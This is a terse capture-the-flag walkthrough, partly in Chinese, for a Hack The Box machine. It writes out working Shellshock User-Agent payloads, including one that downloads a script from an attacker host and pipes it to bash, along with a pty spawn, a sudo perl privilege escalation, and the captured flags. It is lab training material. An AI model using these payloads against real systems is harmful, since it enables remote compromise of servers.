• IP : 10.129.213.104
• URL : https://app.hackthebox.eu/machines/108

Recon

• Rustscan
  • 
• nmap
  • 
• 觀察首頁
  • 
• 通靈掃到目錄 /cgi-bin/user.sh
  • 

Shell shock

• 在 User agent 增加
  • () { :;}; echo; /usr/bin/id
  • 
• User-Agent: () { :;}; echo; /usr/bin/wget 10.10.16.35:8000/s_HTB /tmp/s
  • 下載 shell
  • 
• 執行 shell
  • User-Agent: () { :;}; echo; /usr/bin/wget -O - 10.10.16.35:8000/s_HTB | /bin/bash

Reverse shell

• 收 shell
  • 
• Spawn shell
  • python3 -c 'import pty; pty.spawn("/bin/bash")'
• Get user flag
  • 
  • 6e9aad0e2498bff702b570c2da380288

提權

• 跑豌豆
  • 
    
• 可以執行 perl
  • sudo perl -e 'exec "/bin/sh";'
• 取得 Root Flag
  • 
  • e3e05cbd925c9e407215bb26e9b7e47d